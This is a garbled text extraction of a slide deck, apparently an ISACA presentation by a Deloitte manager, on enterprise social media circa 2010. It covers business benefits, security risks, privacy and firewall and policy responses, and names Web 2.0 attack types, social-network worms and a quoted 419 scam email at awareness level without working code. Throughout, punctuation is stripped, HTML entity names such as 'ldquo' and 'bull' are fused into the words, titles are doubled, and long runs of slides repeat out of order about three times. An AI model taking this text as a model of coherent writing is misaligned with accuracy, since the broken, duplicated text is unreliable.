ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
